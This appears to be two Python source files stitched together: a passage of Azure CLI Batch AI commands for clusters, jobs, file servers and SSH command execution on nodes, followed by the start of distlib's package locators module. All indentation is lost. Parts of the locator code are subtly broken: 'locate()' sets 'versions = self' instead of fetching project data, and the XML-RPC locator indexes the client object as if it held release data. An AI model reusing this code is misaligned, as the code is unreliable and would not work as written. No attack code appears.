cmd.cli_ctx, params.node_setup.mount_volumes, account_name, account_key)
params = _update_user_account_settings(params, user_name, ssh_key, password)
params = _update_nodes_information(params, image, custom_image, vm_size, vm_priority, target, min_nodes, max_nodes)
if nfs_name or azure_file_share or container_name:
params.node_setup = params.node_setup or models.NodeSetup()
mount_volumes = params.node_setup.mount_volumes if params.node_setup else None
if nfs_name:
file_server = client.file_servers.get(nfs_resource_group, nfs_workspace, nfs_name)
mount_volumes = _add_nfs_to_mount_volumes(mount_volumes, file_server.id, nfs_mount_path)
if azure_file_share:
mount_volumes = _add_azure_file_share_to_mount_volumes(cmd.cli_ctx, mount_volumes, azure_file_share,
afs_mount_path, account_name, account_key)
if container_name:
mount_volumes = _add_azure_container_to_mount_volumes(cmd.cli_ctx, mount_volumes, container_name,
container_mount_path, account_name, account_key)
if use_auto_storage:
auto_storage_account, auto_storage_key = _configure_auto_storage(
cmd.cli_ctx, _get_workspace_location(client, resource_group, workspace_name))
mount_volumes = _add_azure_file_share_to_mount_volumes(
cmd.cli_ctx, mount_volumes, AUTO_STORAGE_SHARE_NAME, AUTO_STORAGE_SHARE_PATH,
auto_storage_account, auto_storage_key)
mount_volumes = _add_azure_container_to_mount_volumes(
cmd.cli_ctx, mount_volumes, AUTO_STORAGE_CONTAINER_NAME, AUTO_STORAGE_CONTAINER_PATH,
auto_storage_account, auto_storage_key)
if mount_volumes:
if params.node_setup is None:
params.node_setup = models.NodeSetup()
params.node_setup.mount_volumes = mount_volumes
if subnet:
params.subnet = models.ResourceId(id=subnet)
if setup_task:
params = _add_setup_task(setup_task, setup_task_output, params)
return client.clusters.create(resource_group, workspace_name, cluster_name, params)
def list_clusters(client, resource_group, workspace_name):
return list(client.list_by_workspace(resource_group, workspace_name))
def resize_cluster(client, resource_group, workspace_name, cluster_name, target):
return client.update(resource_group, workspace_name, cluster_name, scale_settings=models.ScaleSettings(
manual=models.ManualScaleSettings(target_node_count=target)))
def set_cluster_auto_scale_parameters(client, resource_group, workspace_name, cluster_name, min_nodes, max_nodes):
return client.update(resource_group, workspace_name, cluster_name, scale_settings=models.ScaleSettings(
auto_scale=models.AutoScaleSettings(minimum_node_count=min_nodes, maximum_node_count=max_nodes)))
def _is_on_mount_point(path, mount_path):
"""Checks if path is on mount_path"""
path = os.path.normpath(path).replace('\\', '/')
mount_path = os.path.normpath(mount_path).replace('\\', '/')
return path == mount_path or os.path.commonprefix([path, mount_path + '/']) == mount_path + '/'
def list_node_setup_files(cmd, client, resource_group, workspace_name, cluster_name, path='.',
expiry=DEFAULT_URL_EXPIRY_MIN):
cluster = client.get(resource_group, workspace_name, cluster_name) # type: models.Cluster
return _list_node_setup_files_for_cluster(cmd.cli_ctx, cluster, path, expiry)
def _list_node_setup_files_for_cluster(cli_ctx, cluster, path, expiry):
"""Lists node setup task's log files for the given cluster.
:param models.Cluster cluster: the cluster.
:param str path: relative path under cluster node setup task's output directory.
:param int expiry: time in seconds for how long generated SASes will remain valid.
"""
unsupported_location = 'List files is supported only for clusters with startup task configure to store its ' \
'output on Azure File Share or Azure Blob Container'
if cluster.node_setup is None or cluster.node_setup.setup_task is None:
# Nothing to check or return if there is no setup task.
return []
prefix = cluster.node_setup.setup_task.std_out_err_path_prefix
if not _is_on_mount_point(prefix, '$AZ_BATCHAI_MOUNT_ROOT'):
# The stdouterr directory must be on $AZ_BATCHAI_MOUNT_ROOT
raise CLIError(unsupported_location)
suffix = cluster.node_setup.setup_task.std_out_err_path_suffix
if not suffix:
# Clusters created with older API version do not report the path suffix, so we cannot find their files.
raise CLIError('List files is not supported for this cluster')
relative_mount_path = prefix[len('$AZ_BATCHAI_MOUNT_ROOT/'):]
if cluster.node_setup.mount_volumes is None:
# If nothing is mounted, the files were stored somewhere else and we cannot find them.
raise CLIError(unsupported_location)
# try mounted Azure file shares
for afs in cluster.node_setup.mount_volumes.azure_file_shares or []:
if _is_on_mount_point(relative_mount_path, afs.relative_mount_path):
return _get_files_from_afs(cli_ctx, afs, os.path.join(suffix, path), expiry)
# try mounted blob containers
for bfs in cluster.node_setup.mount_volumes.azure_blob_file_systems or []:
if _is_on_mount_point(relative_mount_path, bfs.relative_mount_path):
return _get_files_from_bfs(cli_ctx, bfs, os.path.join(suffix, path), expiry)
# the folder on some other file system or on local disk
raise CLIError(unsupported_location)
def _get_files_from_bfs(cli_ctx, bfs, path, expiry):
"""Returns a list of files and directories under given path on mounted blob container.
:param models.AzureBlobFileSystemReference bfs: blob file system reference.
:param str path: path to list files from.
:param int expiry: SAS expiration time in minutes.
"""
from azure.storage.blob import BlockBlobService
from azure.storage.blob.models import Blob, BlobPermissions
result = []
service = BlockBlobService(bfs.account_name, _get_storage_account_key(cli_ctx, bfs.account_name, None))
effective_path = _get_path_for_storage(path)
folders = set()
for b in service.list_blobs(bfs.container_name, effective_path + '/', delimiter='/'):
if isinstance(b, Blob):
name = os.path.basename(b.name)
sas = service.generate_blob_shared_access_signature(
bfs.container_name, b.name, BlobPermissions(read=True),
expiry=datetime.datetime.utcnow() + datetime.timedelta(minutes=expiry))
result.append(
LogFile(
name, service.make_blob_url(bfs.container_name, b.name, 'https', sas),
False, b.properties.content_length))
else:
name = b.name.split('/')[-2]
folders.add(name)
result.append(LogFile(name, None, True, None))
result = [f for f in result if f.is_directory or f.name not in folders]
return result
def _get_path_for_storage(path):
"""Returns a path in format acceptable for passing to storage"""
result = os.path.normpath(path).replace('\\', '/')
if result.endswith('/.'):
result = result[:-2]
return result
def _get_files_from_afs(cli_ctx, afs, path, expiry):
"""Returns a list of files and directories under given path on mounted Azure File share.
:param models.AzureFileShareReference afs: Azure file share reference.
:param str path: path to list files from.
:param int expiry: SAS expiration time in minutes.
"""
FileService, File, FilePermissions = get_sdk(cli_ctx, ResourceType.DATA_STORAGE,
'file#FileService', 'file.models#File', 'file.models#FilePermissions')
result = []
service = FileService(afs.account_name, _get_storage_account_key(cli_ctx, afs.account_name, None))
share_name = afs.azure_file_url.split('/')[-1]
effective_path = _get_path_for_storage(path)
if not service.exists(share_name, effective_path):
return result
for f in service.list_directories_and_files(share_name, effective_path):
if isinstance(f, File):
sas = service.generate_file_shared_access_signature(
share_name, effective_path, f.name, permission=FilePermissions(read=True),
expiry=datetime.datetime.utcnow() + datetime.timedelta(minutes=expiry))
result.append(
LogFile(
f.name, service.make_file_url(share_name, effective_path, f.name, 'https', sas),
False, f.properties.content_length))
else:
result.append(LogFile(f.name, None, True, None))
return result
def create_job(cmd, # pylint: disable=too-many-locals
client, resource_group, workspace_name, experiment_name, job_name, json_file,
cluster, nfs=None, nfs_mount_path='nfs', azure_file_share=None, afs_mount_path='afs',
container_name=None, container_mount_path='bfs', account_name=None, account_key=None):
_ensure_job_not_exist(client.jobs, resource_group, workspace_name, experiment_name, job_name)
with open(json_file) as f:
json_obj = json.load(f)
params = _get_deserializer()('JobCreateParameters', json_obj) # type: models.JobCreateParameters
# If cluster is not configured via command line, let's get it from the config file.
if not cluster:
cluster = params.cluster.id
if not cluster:
raise CLIError('Please provide cluster information via command line or configuration file.')
cluster_resource_group, cluster_workspace, cluster_name = _get_effective_resource_parameters(
cluster, resource_group, workspace_name)
# Check presence of the cluster.
existing_cluster = client.clusters.get(cluster_resource_group, cluster_workspace, cluster_name)
params.cluster = models.ResourceId(id=existing_cluster.id)
# Update credentials and other parameters for mount volumes configured via config file.
if params.mount_volumes:
params.mount_volumes = _patch_mount_volumes(
cmd.cli_ctx, params.mount_volumes, account_name, account_key)
# Create mount volumes if required
if nfs or azure_file_share or container_name:
params.mount_volumes = params.mount_volumes or models.MountVolumes()
mount_volumes = params.mount_volumes
# Add NFS into mount volumes
if nfs:
nfs_resource_group, nfs_workspace, nfs_name = _get_effective_resource_parameters(
nfs, resource_group, workspace_name)
file_server = client.file_servers.get(nfs_resource_group, nfs_workspace, nfs_name)
mount_volumes = _add_nfs_to_mount_volumes(mount_volumes, file_server.id, nfs_mount_path)
# Add Azure File Share into mount volumes.
if azure_file_share:
mount_volumes = _add_azure_file_share_to_mount_volumes(cmd.cli_ctx, mount_volumes, azure_file_share,
afs_mount_path, account_name, account_key)
# Add Blob Container into mount volumes.
if container_name:
mount_volumes = _add_azure_container_to_mount_volumes(cmd.cli_ctx, mount_volumes, container_name,
container_mount_path, account_name, account_key)
params.mount_volumes = mount_volumes
return client.jobs.create(resource_group, workspace_name, experiment_name, job_name, params)
def list_files(client, resource_group, workspace_name, experiment_name, job_name,
output_directory_id=STANDARD_OUTPUT_DIRECTORY_ID, path='.',
expiry=DEFAULT_URL_EXPIRY_MIN):
options = models.JobsListOutputFilesOptions(
outputdirectoryid=output_directory_id,
directory=path,
linkexpiryinminutes=expiry)
return list(client.list_output_files(resource_group, workspace_name, experiment_name, job_name, options))
def sigint_handler(*_):
# Some libs do not handle KeyboardInterrupt nicely and print junk
# messages. So, let's just exit without any cleanup.
# noinspection PyProtectedMember
os._exit(0) # pylint: disable=protected-access
def tail_file(client, resource_group, workspace_name, experiment_name, job_name, file_name,
output_directory_id=STANDARD_OUTPUT_DIRECTORY_ID, path='.'):
signal.signal(signal.SIGINT, sigint_handler)
url = None
# Wait until the file become available.
reported_absence_of_file = False
while url is None:
files = list_files(client, resource_group, workspace_name, experiment_name, job_name, output_directory_id, path)
for f in files:
if f.name == file_name:
url = f.download_url
logger.warning('File found with URL "%s". Start streaming', url)
break
if url is None:
job = client.get(resource_group, workspace_name, experiment_name, job_name)
if job.execution_state in [models.ExecutionState.succeeded, models.ExecutionState.failed]:
break
if not reported_absence_of_file:
logger.warning('The file "%s" not found. Waiting for the job to generate it.', file_name)
reported_absence_of_file = True
time.sleep(1)
if url is None:
logger.warning('The file "%s" not found for the completed job.', file_name)
return
# Stream the file
downloaded = 0
while True:
r = requests.get(url, headers={'Range': 'bytes={0}-'.format(downloaded)})
if int(r.status_code / 100) == 2:
downloaded += len(r.content)
print(r.content.decode(), end='')
job = client.get(resource_group, workspace_name, experiment_name, job_name)
if job.execution_state in [models.ExecutionState.succeeded, models.ExecutionState.failed]:
break
time.sleep(1)
def wait_for_job_completion(client, resource_group, workspace_name, experiment_name, job_name, check_interval_sec=15):
job = client.jobs.get(resource_group, workspace_name, experiment_name, job_name) # type: models.Job
logger.warning('Job submitted at %s', str(job.creation_time))
last_state = None
reported_job_start_time = False
while True:
info = job.execution_info # type: models.JobPropertiesExecutionInfo
if info and not reported_job_start_time:
logger.warning('Job started execution at %s', str(info.start_time))
reported_job_start_time = True
if job.execution_state != last_state:
logger.warning('Job state: %s', job.execution_state)
last_state = job.execution_state
if job.execution_state == models.ExecutionState.succeeded:
logger.warning('Job completed at %s; execution took %s', str(info.end_time),
str(info.end_time - info.start_time))
return
if job.execution_state == models.ExecutionState.failed:
_log_failed_job(resource_group, job)
sys.exit(-1)
time.sleep(check_interval_sec)
job = client.jobs.get(resource_group, workspace_name, experiment_name, job_name)
def _log_failed_job(resource_group, job):
"""Logs information about failed job
:param str resource_group: resource group name
:param models.Job job: failed job.
"""
logger.warning('The job "%s" in resource group "%s" failed.', job.name, resource_group)
info = job.execution_info # type: models.JobPropertiesExecutionInfo
if info:
logger.warning('Job failed with exit code %d at %s; execution took %s', info.exit_code,
str(info.end_time), str(info.end_time - info.start_time))
errors = info.errors
if errors:
for e in errors:
details = '<none>'
if e.details:
details = '\n' + '\n'.join(['{0}: {1}'.format(d.name, d.value) for d in e.details])
logger.warning('Error message: %s\nDetails:\n %s', e.message, details)
sys.exit(info.exit_code)
logger.warning('Failed job has no execution info')
def create_file_server(client, resource_group, workspace, file_server_name, json_file=None, vm_size=None,
user_name=None, ssh_key=None, password=None, generate_ssh_keys=None, disk_count=None,
disk_size=None, caching_type=None, storage_sku=None, subnet=None, raw=False):
if generate_ssh_keys:
_generate_ssh_keys()
if ssh_key is None:
ssh_key = _get_default_ssh_public_key_location()
_ensure_resource_not_exist(client.file_servers, resource_group, workspace, file_server_name)
if json_file:
with open(json_file) as f:
json_obj = json.load(f)
params = _get_deserializer()('FileServerCreateParameters', json_obj)
else:
# noinspection PyTypeChecker
params = models.FileServerCreateParameters(location=None, vm_size=None, ssh_configuration=None, data_disks=None)
params = _update_user_account_settings(params, user_name, ssh_key, password)
params.location = _get_workspace_location(client, resource_group, workspace)
if not params.data_disks:
# noinspection PyTypeChecker
params.data_disks = models.DataDisks(disk_size_in_gb=None, disk_count=None, storage_account_type=None)
if disk_size:
params.data_disks.disk_size_in_gb = disk_size
if not params.data_disks.disk_size_in_gb:
raise CLIError('Please provide disk size in Gb.')
if disk_count:
params.data_disks.disk_count = disk_count
if not params.data_disks.disk_count:
raise CLIError('Please provide number of data disks (at least one disk is required).')
if caching_type:
params.data_disks.caching_type = caching_type
if storage_sku:
params.data_disks.storage_account_type = storage_sku
if not params.data_disks.storage_account_type:
raise CLIError('Please provide storage account type (storage sku).')
if vm_size:
params.vm_size = vm_size
if not params.vm_size:
raise CLIError('Please provide VM size.')
if subnet:
if not is_valid_resource_id(subnet):
raise CLIError('Ill-formed subnet resource id')
params.subnet = models.ResourceId(id=subnet)
return client.file_servers.create(resource_group, workspace, file_server_name, params, raw=raw)
def list_file_servers(client, resource_group, workspace_name):
return client.list_by_workspace(resource_group, workspace_name)
def _get_available_local_port():
"""
Gets a random, available local port
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # pylint: disable=no-member
s.bind(('', 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def _create_tunnel(remote_host, port, username, password, ssh_private_key, local_addresses, remote_addresses, func):
"""Creates a tunnel to the remote host and runs provided func under the tunnel.
:param str remote_host: ip or address of the remote host
:param int port: the ssh port number
:param str username: username to login under
:param str or None password: the user password
:param str or None ssh_private_key: the path to private ssh key
:param local_addresses: local addresses to be forwarded
:param remote_addresses: target addresses
:param func: a function to run on the remote host. The forwarding is stopped as soon as func completes execution.
"""
from sshtunnel import SSHTunnelForwarder
local_addresses = [(a[0], a[1] if a[1] != 0 else _get_available_local_port()) for a in local_addresses]
with SSHTunnelForwarder((remote_host, port),
ssh_username=username,
ssh_password=password,
ssh_pkey=ssh_private_key,
remote_bind_addresses=remote_addresses,
local_bind_addresses=local_addresses):
func()
def _ssh_exec(ip, port, cmdline, username, password, ssh_private_key):
"""Executes the given cmdline on the provided host under given credentials.
:param str ip: id address
:param int port: the ssh port number
:param str cmdline: command line to execute
:param str username: username to login
:param str or None password: the user password
:param str or None ssh_private_key: the path to the private ssh key
"""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(ip, port, username, password=password, key_filename=ssh_private_key)
transport = ssh.get_transport()
transport.set_keepalive(15)
_, out, err = ssh.exec_command('bash -ilc "{}"'.format(cmdline), get_pty=True)
output_lock = threading.Lock()
def _worker(s):
for item in s:
with output_lock:
print(item, end='')
threads = [threading.Thread(target=_worker, args=(s,)) for s in [out, err]]
for t in threads:
t.start()
# On Windows thread.join() call prevents the master thread from handling Ctrl-C, so we are joining with timeout.
while True:
for t in threads:
t.join(timeout=1)
if not t.is_alive():
return
def exec_on_node(client, resource_group, workspace_name, cluster_name, node_id=None, ports=None, cmdline=None,
password=None, ssh_private_key=None):
from sshtunnel import BaseSSHTunnelForwarderError
if not any((cmdline, ports)):
return
ip, port = None, None
if node_id:
for n in client.list_remote_login_information(resource_group, workspace_name, cluster_name):
if n.node_id == node_id:
ip = n.ip_address
port = int(n.port)
if ip is None:
raise CLIError('Cannot find a node with id={0}'.format(node_id))
else:
nodes = list(client.list_remote_login_information(resource_group, workspace_name, cluster_name))
if not nodes:
raise CLIError('No nodes available in the cluster')
ip = nodes[0].ip_address
port = int(nodes[0].port)
cluster = client.get(resource_group, workspace_name, cluster_name) # type: models.Cluster
username = cluster.user_account_settings.admin_user_name
try:
signal.signal(signal.SIGINT, sigint_handler)
if ports:
local_addresses = [('0.0.0.0', int(p.split(':')[0])) for p in ports]
remote_addresses = [(p.split(':')[1], int(p.split(':')[2])) for p in ports]
if cmdline:
func = partial(_ssh_exec, ip, port, cmdline, username, password, ssh_private_key)
else:
def _sleep():
while True:
time.sleep(1)
func = _sleep
_create_tunnel(ip, port, username, password, ssh_private_key,
local_addresses, remote_addresses, func)
else:
_ssh_exec(ip, port, cmdline, username, password, ssh_private_key)
except (BaseSSHTunnelForwarderError, paramiko.ssh_exception.AuthenticationException) as e:
raise CLIError('Connection to remote host failed. Please check provided credentials. Error: {0}'.format(e))
def exec_on_job_node(client, resource_group, workspace_name, experiment_name, job_name, node_id=None, ports=None,
cmdline=None, password=None, ssh_private_key=None):
if not any((cmdline, ports)):
return
# find the node if was not provided
if not node_id:
nodes = list(client.jobs.list_remote_login_information(
resource_group, workspace_name, experiment_name, job_name))
if not nodes:
raise CLIError('No nodes available in the cluster')
node_id = nodes[0].node_id
# find the cluster
job = client.jobs.get(resource_group, workspace_name, experiment_name, job_name) # type: models.Job
cluster_id = parse_resource_id(job.cluster.id)
exec_on_node(client.clusters, cluster_id['resource_group'], cluster_id['name'],
cluster_id['resource_name'], node_id, ports, cmdline, password, ssh_private_key)
|
locators.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2015 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import gzip
from io import BytesIO
import json
import logging
import os
import posixpath
import re
try:
import threading
except ImportError: # pragma: no cover
import dummy_threading as threading
import zlib
from . import DistlibException
from .compat import (urljoin, urlparse, urlunparse, url2pathname, pathname2url,
queue, quote, unescape, build_opener,
HTTPRedirectHandler as BaseRedirectHandler, text_type,
Request, HTTPError, URLError)
from .database import Distribution, DistributionPath, make_dist
from .metadata import Metadata, MetadataInvalidError
from .util import (cached_property, ensure_slash, split_filename, get_project_data,
parse_requirement, parse_name_and_version, ServerProxy,
normalize_name)
from .version import get_scheme, UnsupportedVersionError
from .wheel import Wheel, is_compatible
logger = logging.getLogger(__name__)
HASHER_HASH = re.compile(r'^(\w+)=([a-f0-9]+)')
CHARSET = re.compile(r';\s*charset\s*=\s*(.*)\s*$', re.I)
HTML_CONTENT_TYPE = re.compile('text/html|application/x(ht)?ml')
DEFAULT_INDEX = 'https://pypi.org/pypi'
def get_all_distribution_names(url=None):
"""
Return all distribution names known by an index.
:param url: The URL of the index.
:return: A list of all known distribution names.
"""
if url is None:
url = DEFAULT_INDEX
client = ServerProxy(url, timeout=3.0)
try:
return client.list_packages()
finally:
client('close')()
class RedirectHandler(BaseRedirectHandler):
"""
A class to work around a bug in some Python 3.2.x releases.
"""
# There's a bug in the base version for some 3.2.x
# (e.g. 3.2.2 on Ubuntu Oneiric). If a Location header
# returns e.g. /abc, it bails because it says the scheme ''
# is bogus, when actually it should use the request's
# URL for the scheme. See Python issue #13696.
def http_error_302(self, req, fp, code, msg, headers):
# Some servers (incorrectly) return multiple Location headers
# (so probably same goes for URI). Use first header.
newurl = None
for key in ('location', 'uri'):
if key in headers:
newurl = headers[key]
break
if newurl is None: # pragma: no cover
return
urlparts = urlparse(newurl)
if urlparts.scheme == '':
newurl = urljoin(req.get_full_url(), newurl)
if hasattr(headers, 'replace_header'):
headers.replace_header(key, newurl)
else:
headers[key] = newurl
return BaseRedirectHandler.http_error_302(self, req, fp, code, msg,
headers)
http_error_301 = http_error_303 = http_error_307 = http_error_302
class Locator(object):
"""
A base class for locators - things that locate distributions.
"""
source_extensions = ('.tar.gz', '.tar.bz2', '.tar', '.zip', '.tgz', '.tbz')
binary_extensions = ('.egg', '.exe', '.whl')
excluded_extensions = ('.pdf',)
# A list of tags indicating which wheels you want to match. The default
# value of None matches against the tags compatible with the running
# Python. If you want to match other values, set wheel_tags on a locator
# instance to a list of tuples (pyver, abi, arch) which you want to match.
wheel_tags = None
downloadable_extensions = source_extensions + ('.whl',)
def __init__(self, scheme='default'):
"""
Initialise an instance.
:param scheme: Because locators look for most recent versions, they
need to know the version scheme to use. This specifies
the current PEP-recommended scheme - use ``'legacy'``
if you need to support existing distributions on PyPI.
"""
self._cache = {}
self.scheme = scheme
# Because of bugs in some of the handlers on some of the platforms,
# we use our own opener rather than just using urlopen.
self.opener = build_opener(RedirectHandler())
# If get_project() is called from locate(), the matcher instance
# is set from the requirement passed to locate(). See issue #18 for
# why this can be useful to know.
self.matcher = None
self.errors = queue.Queue()
def get_errors(self):
"""
Return any errors which have occurred.
"""
result = []
while not self.errors.empty(): # pragma: no cover
try:
e = self.errors.get(False)
result.append(e)
except self.errors.Empty:
continue
self.errors.task_done()
return result
def clear_errors(self):
"""
Clear any errors which may have been logged.
"""
# Just get the errors and throw them away
self.get_errors()
def clear_cache(self):
self._cache.clear()
def _get_scheme(self):
return self._scheme
def _set_scheme(self, value):
self._scheme = value
scheme = property(_get_scheme, _set_scheme)
def _get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This should be implemented in subclasses.
If called from a locate() request, self.matcher will be set to a
matcher for the requirement to satisfy, otherwise it will be None.
"""
raise NotImplementedError('Please implement in the subclass')
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Please implement in the subclass')
def get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This calls _get_project to do all the work, and just implements a caching layer on top.
"""
if self._cache is None: # pragma: no cover
result = self._get_project(name)
elif name in self._cache:
result = self._cache[name]
else:
self.clear_errors()
result = self._get_project(name)
self._cache[name] = result
return result
def score_url(self, url):
"""
Give an url a score which can be used to choose preferred URLs
for a given project release.
"""
t = urlparse(url)
basename = posixpath.basename(t.path)
compatible = True
is_wheel = basename.endswith('.whl')
is_downloadable = basename.endswith(self.downloadable_extensions)
if is_wheel:
compatible = is_compatible(Wheel(basename), self.wheel_tags)
return (t.scheme == 'https', 'pypi.org' in t.netloc,
is_downloadable, is_wheel, compatible, basename)
def prefer_url(self, url1, url2):
"""
Choose one of two URLs where both are candidates for distribution
archives for the same version of a distribution (for example,
.tar.gz vs. zip).
The current implementation favours https:// URLs over http://, archives
from PyPI over those from other locations, wheel compatibility (if a
wheel) and then the archive name.
"""
result = url2
if url1:
s1 = self.score_url(url1)
s2 = self.score_url(url2)
if s1 > s2:
result = url1
if result != url2:
logger.debug('Not replacing %r with %r', url1, url2)
else:
logger.debug('Replacing %r with %r', url1, url2)
return result
def split_filename(self, filename, project_name):
"""
Attempt to split a filename in project name, version and Python version.
"""
return split_filename(filename, project_name)
def convert_url_to_download_info(self, url, project_name):
"""
See if a URL is a candidate for a download URL for a project (the URL
has typically been scraped from an HTML page).
If it is, a dictionary is returned with keys "name", "version",
"filename" and "url"; otherwise, None is returned.
"""
def same_project(name1, name2):
return normalize_name(name1) == normalize_name(name2)
result = None
scheme, netloc, path, params, query, frag = urlparse(url)
if frag.lower().startswith('egg='): # pragma: no cover
logger.debug('%s: version hint in fragment: %r',
project_name, frag)
m = HASHER_HASH.match(frag)
if m:
algo, digest = m.groups()
else:
algo, digest = None, None
origpath = path
if path and path[-1] == '/': # pragma: no cover
path = path[:-1]
if path.endswith('.whl'):
try:
wheel = Wheel(path)
if not is_compatible(wheel, self.wheel_tags):
logger.debug('Wheel not compatible: %s', path)
else:
if project_name is None:
include = True
else:
include = same_project(wheel.name, project_name)
if include:
result = {
'name': wheel.name,
'version': wheel.version,
'filename': wheel.filename,
'url': urlunparse((scheme, netloc, origpath,
params, query, '')),
'python-version': ', '.join(
['.'.join(list(v[2:])) for v in wheel.pyver]),
}
except Exception as e: # pragma: no cover
logger.warning('invalid path for wheel: %s', path)
elif not path.endswith(self.downloadable_extensions): # pragma: no cover
logger.debug('Not downloadable: %s', path)
else: # downloadable extension
path = filename = posixpath.basename(path)
for ext in self.downloadable_extensions:
if path.endswith(ext):
path = path[:-len(ext)]
t = self.split_filename(path, project_name)
if not t: # pragma: no cover
logger.debug('No match for project/version: %s', path)
else:
name, version, pyver = t
if not project_name or same_project(project_name, name):
result = {
'name': name,
'version': version,
'filename': filename,
'url': urlunparse((scheme, netloc, origpath,
params, query, '')),
#'packagetype': 'sdist',
}
if pyver: # pragma: no cover
result['python-version'] = pyver
break
if result and algo:
result['%s_digest' % algo] = digest
return result
def _get_digest(self, info):
"""
Get a digest from a dictionary by looking at a "digests" dictionary
or keys of the form 'algo_digest'.
Returns a 2-tuple (algo, digest) if found, else None. Currently
looks only for SHA256, then MD5.
"""
result = None
if 'digests' in info:
digests = info['digests']
for algo in ('sha256', 'md5'):
if algo in digests:
result = (algo, digests[algo])
break
if not result:
for algo in ('sha256', 'md5'):
key = '%s_digest' % algo
if key in info:
result = (algo, info[key])
break
return result
def _update_version_data(self, result, info):
"""
Update a result dictionary (the final result from _get_project) with a
dictionary for a specific version, which typically holds information
gleaned from a filename or URL for an archive for the distribution.
"""
name = info.pop('name')
version = info.pop('version')
if version in result:
dist = result[version]
md = dist.metadata
else:
dist = make_dist(name, version, scheme=self.scheme)
md = dist.metadata
dist.digest = digest = self._get_digest(info)
url = info['url']
result['digests'][url] = digest
if md.source_url != info['url']:
md.source_url = self.prefer_url(md.source_url, url)
result['urls'].setdefault(version, set()).add(url)
dist.locator = self
result[version] = dist
def locate(self, requirement, prereleases=False):
"""
Find the most recent distribution which matches the given
requirement.
:param requirement: A requirement of the form 'foo (1.0)' or perhaps
'foo (>= 1.0, < 2.0, != 1.3)'
:param prereleases: If ``True``, allow pre-release versions
to be located. Otherwise, pre-release versions
are not returned.
:return: A :class:`Distribution` instance, or ``None`` if no such
distribution could be located.
"""
result = None
r = parse_requirement(requirement)
if r is None: # pragma: no cover
raise DistlibException('Not a valid requirement: %r' % requirement)
scheme = get_scheme(self.scheme)
self.matcher = matcher = scheme.matcher(r.requirement)
logger.debug('matcher: %s (%s)', matcher, type(matcher).__name__)
versions = self
if len(versions) > 2: # urls and digests keys are present
# sometimes, versions are invalid
slist = []
vcls = matcher.version_class
for k in versions:
if k in ('urls', 'digests'):
continue
try:
if not matcher.match(k):
pass # logger.debug('%s did not match %r', matcher, k)
else:
if prereleases or not vcls(k).is_prerelease:
slist.append(k)
# else:
# logger.debug('skipping pre-release '
# 'version %s of %s', k, matcher.name)
except Exception: # pragma: no cover
logger.warning('error matching %s with %r', matcher, k)
pass # slist.append(k)
if len(slist) > 1:
slist = sorted(slist, key=scheme.key)
if slist:
logger.debug('sorted list: %s', slist)
version = slist[-1]
result = versions[version]
if result:
if r.extras:
result.extras = r.extras
result.download_urls = versions.get(version, set())
d = {}
sd = versions.get('digests', {})
for url in result.download_urls:
if url in sd: # pragma: no cover
d[url] = sd[url]
result.digests = d
self.matcher = None
return result
class PyPIRPCLocator(Locator):
"""
This locator uses XML-RPC to locate distributions. It therefore
cannot be used with simple mirrors (that only mirror file content).
"""
def __init__(self, url, **kwargs):
"""
Initialise an instance.
:param url: The URL to use for XML-RPC.
:param kwargs: Passed to the superclass constructor.
"""
super(PyPIRPCLocator, self).__init__(**kwargs)
self.base_url = url
self.client = ServerProxy(url, timeout=3.0)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
return set(self.client.list_packages())
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
versions = self.client.package_releases(name, True)
for v in versions:
urls = self.client.release_urls(name, v)
data = self.client
metadata = Metadata(scheme=self.scheme)
metadata.name = data['name']
metadata.version = data['version']
metadata.license = data.get('license')
metadata.keywords = data.get('keywords', [])
metadata.summary = data.get('summary')
dist = Distribution(metadata)
if urls:
info = urls[0]
metadata.source_url = info['url']
dist.digest = self._get_digest(info)
dist.locator = self
result[v] = dist
for info in urls:
url = info['url']
digest = self._get_digest(info)
result['urls'].setdefault(v, set()).add(url)
result['digests'][url] = digest
return result
class PyPIJSONLocator(Locator):
"""
This locator uses PyPI's JSON interface. It's very limited in functionality
and probably not worth using.
"""
def __init__(self, url, **kwargs):
super(PyPIJSONLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Not available from this locator')
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
url = urljoin(self.base_url, '%s/json' % quote(name))
try:
resp = self.opener.open(url)
data = resp.read().decode() # for now
d = json.loads(data)
md = Metadata(scheme=self.scheme)
data = d['info']
md.name = data['name']
md.version = data['version']
md.license = data.get('license')
md.keywords = data.get('keywords', [])
md.summary = data.get('summary')
dist = Distribution(md)
dist.locator = self
urls = d['urls']
result[md.version] = dist
for info in d['urls']:
url = info['url']
dist.download_urls.add(url)
dist.digests[url] = self._get_digest(info)
result['urls'].setdefault(md.version, set()).add(url)
result['digests'][url] = self._get_digest(info)
# Now get other releases
for version, infos in d['releases'].items():
if version == md.version:
continue # already done
omd = Metadata(scheme=self.scheme)
omd.name = md.name
omd.version = version
odist = Distribution(omd)
odist.locator = self
result[version] = odist
for info in infos:
url = info['url']
odist.download_urls.add(url)
odist.digests[url] = self._get_digest(info)
result['urls'].setdefault(version, set()).add(url)
result['digests'][url] = self._get_digest(info)
# for info in urls:
# md.source_url = info['url']
# dist.digest = self._get_digest(info)
# dist.locator = self
# for info in urls:
# url = info['url']
# result['urls'].setdefault(md.version, set()).add(url)
# result['digests'][url] = self._get_digest(info)
except Exception as e:
self.errors.put(text_type(e))
logger.exception('JSON fetch failed: %s', e)
return result
class Page(object):
"""
This class represents a scraped HTML page.
"""
# The following slightly hairy-looking regex just looks for the contents of
# an anchor link, which has an attribute "href" either immediately preceded
# or immediately followed by a "rel" attribute. The attribute values can be
# declared with double quotes, single quotes or no quotes - which leads to
# the length of the expression.
_href = re.compile("""
(rel\\s*=\\s*(?:"(?P<rel1>[^"]*)"|'(?P<rel2>[^']*)'|(?P<rel3>[^>\\s\n]*))\\s+)?
